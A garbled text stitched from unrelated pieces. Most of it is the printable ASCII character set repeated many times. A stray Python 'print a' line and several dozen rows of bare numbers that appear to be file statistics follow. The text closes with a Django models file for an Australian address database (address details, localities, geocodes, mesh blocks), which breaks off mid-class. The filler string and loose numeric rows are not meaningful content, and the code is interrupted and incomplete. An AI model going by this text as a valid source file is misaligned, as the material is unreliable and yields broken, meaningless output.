abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCD")
print a
| 1,408.173913
| 31,695
| 0.646505
| 389
| 32,388
| 52.989717
| 0.077121
| 1.955077
| 2.923592
| 3.886091
| 0.980546
| 0.980546
| 0.980546
| 0.980546
| 0.980546
| 0.980546
| 0
| 0.10278
| 0.019174
| 32,388
| 23
| 31,696
| 1,408.173913
| 0.546101
| 0
| 0
| 0.111111
| 0
| 0
| 0.646275
| 0.639563
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.055556
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 15
|
01fe18eaff0b9e5ef1aa07b8cf477ae81e7b8e91
| 23,771
|
py
|
Python
|
api/places/models.py
|
william-librata/places-api
|
4d422fef3de501318ad1d8e55ba576171eea626e
|
[
"MIT"
] | null | null | null |
api/places/models.py
|
william-librata/places-api
|
4d422fef3de501318ad1d8e55ba576171eea626e
|
[
"MIT"
] | null | null | null |
api/places/models.py
|
william-librata/places-api
|
4d422fef3de501318ad1d8e55ba576171eea626e
|
[
"MIT"
] | null | null | null |
from django.db import models
class AddressAlias(models.Model):
address_alias_pid = models.CharField(primary_key=True, max_length=15)
date_created = models.DateField()
date_retired = models.DateField(blank=True, null=True)
principal_pid = models.ForeignKey('AddressDetail', models.DO_NOTHING, db_column='principal_pid', related_name='address_alias_principal_pid', null=True)
alias_pid = models.ForeignKey('AddressDetail', models.DO_NOTHING, db_column='alias_pid', related_name='address_alias_pid', null=True)
alias_type_code = models.ForeignKey('AddressAliasTypeAut', models.DO_NOTHING, db_column='alias_type_code', null=True)
alias_comment = models.CharField(max_length=200, blank=True, null=True)
class Meta:
managed = True
db_table = 'address_alias'
class AddressAliasTypeAut(models.Model):
code = models.CharField(primary_key=True, max_length=10)
name = models.CharField(max_length=50)
description = models.CharField(max_length=30, blank=True, null=True)
class Meta:
managed = True
db_table = 'address_alias_type_aut'
class AddressDefaultGeocode(models.Model):
address_default_geocode_pid = models.CharField(primary_key=True, max_length=15)
date_created = models.DateField()
date_retired = models.DateField(blank=True, null=True)
address_detail_pid = models.ForeignKey('AddressDetail', models.DO_NOTHING, db_column='address_detail_pid', null=True)
geocode_type_code = models.ForeignKey('GeocodeTypeAut', models.DO_NOTHING, db_column='geocode_type_code', null=True)
longitude = models.DecimalField(max_digits=11, decimal_places=8, blank=True, null=True)
latitude = models.DecimalField(max_digits=10, decimal_places=8, blank=True, null=True)
class Meta:
managed = True
db_table = 'address_default_geocode'
class AddressDetail(models.Model):
address_detail_pid = models.CharField(primary_key=True, max_length=15)
date_created = models.DateField()
date_last_modified = models.DateField(blank=True, null=True)
date_retired = models.DateField(blank=True, null=True)
building_name = models.CharField(max_length=200, blank=True, null=True)
lot_number_prefix = models.CharField(max_length=2, blank=True, null=True)
lot_number = models.CharField(max_length=5, blank=True, null=True)
lot_number_suffix = models.CharField(max_length=2, blank=True, null=True)
flat_type_code = models.ForeignKey('FlatTypeAut', models.DO_NOTHING, db_column='flat_type_code', blank=True, null=True)
flat_number_prefix = models.CharField(max_length=2, blank=True, null=True)
flat_number = models.DecimalField(max_digits=5, decimal_places=0, blank=True, null=True)
flat_number_suffix = models.CharField(max_length=2, blank=True, null=True)
level_type_code = models.ForeignKey('LevelTypeAut', models.DO_NOTHING, db_column='level_type_code', blank=True, null=True)
level_number_prefix = models.CharField(max_length=2, blank=True, null=True)
level_number = models.DecimalField(max_digits=3, decimal_places=0, blank=True, null=True)
level_number_suffix = models.CharField(max_length=2, blank=True, null=True)
number_first_prefix = models.CharField(max_length=3, blank=True, null=True)
number_first = models.DecimalField(max_digits=6, decimal_places=0, blank=True, null=True)
number_first_suffix = models.CharField(max_length=2, blank=True, null=True)
number_last_prefix = models.CharField(max_length=3, blank=True, null=True)
number_last = models.DecimalField(max_digits=6, decimal_places=0, blank=True, null=True)
number_last_suffix = models.CharField(max_length=2, blank=True, null=True)
street_locality_pid = models.ForeignKey('StreetLocality', models.DO_NOTHING, db_column='street_locality_pid', blank=True, null=True)
location_description = models.CharField(max_length=45, blank=True, null=True)
locality_pid = models.ForeignKey('Locality', models.DO_NOTHING, db_column='locality_pid', null=True)
alias_principal = models.CharField(max_length=1, blank=True, null=True)
postcode = models.CharField(max_length=4, blank=True, null=True)
private_street = models.CharField(max_length=75, blank=True, null=True)
legal_parcel_id = models.CharField(max_length=20, blank=True, null=True)
confidence = models.DecimalField(max_digits=1, decimal_places=0, blank=True, null=True)
address_site_pid = models.ForeignKey('AddressSite', models.DO_NOTHING, db_column='address_site_pid', null=True)
level_geocoded_code = models.ForeignKey('GeocodedLevelTypeAut', models.DO_NOTHING, db_column='level_geocoded_code', null=True)
property_pid = models.CharField(max_length=15, blank=True, null=True)
gnaf_property_pid = models.CharField(max_length=15, blank=True, null=True)
primary_secondary = models.CharField(max_length=1, blank=True, null=True)
class Meta:
managed = True
db_table = 'address_detail'
class AddressMeshBlock2011(models.Model):
address_mesh_block_2011_pid = models.CharField(primary_key=True, max_length=15)
date_created = models.DateField()
date_retired = models.DateField(blank=True, null=True)
address_detail_pid = models.ForeignKey(AddressDetail, models.DO_NOTHING, db_column='address_detail_pid', null=True)
mb_match_code = models.ForeignKey('MbMatchCodeAut', models.DO_NOTHING, db_column='mb_match_code', null=True)
mb_2011_pid = models.ForeignKey('Mb2011', models.DO_NOTHING, db_column='mb_2011_pid', null=True)
class Meta:
managed = True
db_table = 'address_mesh_block_2011'
class AddressMeshBlock2016(models.Model):
address_mesh_block_2016_pid = models.CharField(primary_key=True, max_length=15)
date_created = models.DateField()
date_retired = models.DateField(blank=True, null=True)
address_detail_pid = models.ForeignKey(AddressDetail, models.DO_NOTHING, db_column='address_detail_pid', null=True)
mb_match_code = models.ForeignKey('MbMatchCodeAut', models.DO_NOTHING, db_column='mb_match_code', null=True)
mb_2016_pid = models.ForeignKey('Mb2016', models.DO_NOTHING, db_column='mb_2016_pid', null=True)
class Meta:
managed = True
db_table = 'address_mesh_block_2016'
class AddressSite(models.Model):
address_site_pid = models.CharField(primary_key=True, max_length=15)
date_created = models.DateField()
date_retired = models.DateField(blank=True, null=True)
address_type = models.ForeignKey('AddressTypeAut', models.DO_NOTHING, db_column='address_type', blank=True, null=True)
address_site_name = models.CharField(max_length=200, blank=True, null=True)
class Meta:
managed = True
db_table = 'address_site'
class AddressSiteGeocode(models.Model):
address_site_geocode_pid = models.CharField(primary_key=True, max_length=15)
date_created = models.DateField()
date_retired = models.DateField(blank=True, null=True)
address_site_pid = models.ForeignKey(AddressSite, models.DO_NOTHING, db_column='address_site_pid', blank=True, null=True)
geocode_site_name = models.CharField(max_length=200, blank=True, null=True)
geocode_site_description = models.CharField(max_length=45, blank=True, null=True)
geocode_type_code = models.ForeignKey('GeocodeTypeAut', models.DO_NOTHING, db_column='geocode_type_code', blank=True, null=True)
reliability_code = models.ForeignKey('GeocodeReliabilityAut', models.DO_NOTHING, db_column='reliability_code', null=True)
boundary_extent = models.DecimalField(max_digits=7, decimal_places=0, blank=True, null=True)
planimetric_accuracy = models.DecimalField(max_digits=12, decimal_places=0, blank=True, null=True)
elevation = models.DecimalField(max_digits=7, decimal_places=0, blank=True, null=True)
longitude = models.DecimalField(max_digits=11, decimal_places=8, blank=True, null=True)
latitude = models.DecimalField(max_digits=10, decimal_places=8, blank=True, null=True)
class Meta:
managed = True
db_table = 'address_site_geocode'
class AddressTypeAut(models.Model):
code = models.CharField(primary_key=True, max_length=8)
name = models.CharField(max_length=50)
description = models.CharField(max_length=30, blank=True, null=True)
class Meta:
managed = True
db_table = 'address_type_aut'
class DjangoMigrations(models.Model):
app = models.CharField(max_length=255)
name = models.CharField(max_length=255)
applied = models.DateTimeField()
class Meta:
managed = True
db_table = 'django_migrations'
class FlatTypeAut(models.Model):
code = models.CharField(primary_key=True, max_length=7)
name = models.CharField(max_length=50)
description = models.CharField(max_length=30, blank=True, null=True)
class Meta:
managed = True
db_table = 'flat_type_aut'
class GeocodeReliabilityAut(models.Model):
code = models.DecimalField(primary_key=True, max_digits=1, decimal_places=0)
name = models.CharField(max_length=50)
description = models.CharField(max_length=100, blank=True, null=True)
class Meta:
managed = True
db_table = 'geocode_reliability_aut'
class GeocodeTypeAut(models.Model):
code = models.CharField(primary_key=True, max_length=4)
name = models.CharField(max_length=50)
description = models.CharField(max_length=250, blank=True, null=True)
class Meta:
managed = True
db_table = 'geocode_type_aut'
class GeocodedLevelTypeAut(models.Model):
code = models.DecimalField(primary_key=True, max_digits=2, decimal_places=0)
name = models.CharField(max_length=50)
description = models.CharField(max_length=70, blank=True, null=True)
class Meta:
managed = True
db_table = 'geocoded_level_type_aut'
class LevelTypeAut(models.Model):
code = models.CharField(primary_key=True, max_length=4)
name = models.CharField(max_length=50)
description = models.CharField(max_length=30, blank=True, null=True)
class Meta:
managed = True
db_table = 'level_type_aut'
class Locality(models.Model):
locality_pid = models.CharField(primary_key=True, max_length=15)
date_created = models.DateField()
date_retired = models.DateField(blank=True, null=True)
locality_name = models.CharField(max_length=100)
primary_postcode = models.CharField(max_length=4, blank=True, null=True)
locality_class_code = models.ForeignKey('LocalityClassAut', models.DO_NOTHING, db_column='locality_class_code', null=True, related_name='localityclassaut')
state_pid = models.ForeignKey('State', models.DO_NOTHING, db_column='state_pid', to_field='state_pid', null=True, related_name='state')
gnaf_locality_pid = models.CharField(max_length=15, blank=True, null=True)
gnaf_reliability_code = models.ForeignKey(GeocodeReliabilityAut, models.DO_NOTHING, db_column='gnaf_reliability_code', null=True, related_name='geocodereliabilityaut')
class Meta:
managed = True
db_table = 'locality'
class LocalityAlias(models.Model):
locality_alias_pid = models.CharField(primary_key=True, max_length=15)
date_created = models.DateField()
date_retired = models.DateField(blank=True, null=True)
locality_pid = models.ForeignKey(Locality, models.DO_NOTHING, db_column='locality_pid', null=True)
name = models.CharField(max_length=100)
postcode = models.CharField(max_length=4, blank=True, null=True)
alias_type_code = models.ForeignKey('LocalityAliasTypeAut', models.DO_NOTHING, db_column='alias_type_code', null=True)
state_pid = models.CharField(max_length=15)
class Meta:
managed = True
db_table = 'locality_alias'
class LocalityAliasTypeAut(models.Model):
code = models.CharField(primary_key=True, max_length=10)
name = models.CharField(max_length=50)
description = models.CharField(max_length=100, blank=True, null=True)
class Meta:
managed = True
db_table = 'locality_alias_type_aut'
class LocalityClassAut(models.Model):
code = models.CharField(primary_key=True, max_length=1)
name = models.CharField(max_length=50)
description = models.CharField(max_length=200, blank=True, null=True)
class Meta:
managed = True
db_table = 'locality_class_aut'
class LocalityNeighbour(models.Model):
locality_neighbour_pid = models.CharField(primary_key=True, max_length=15)
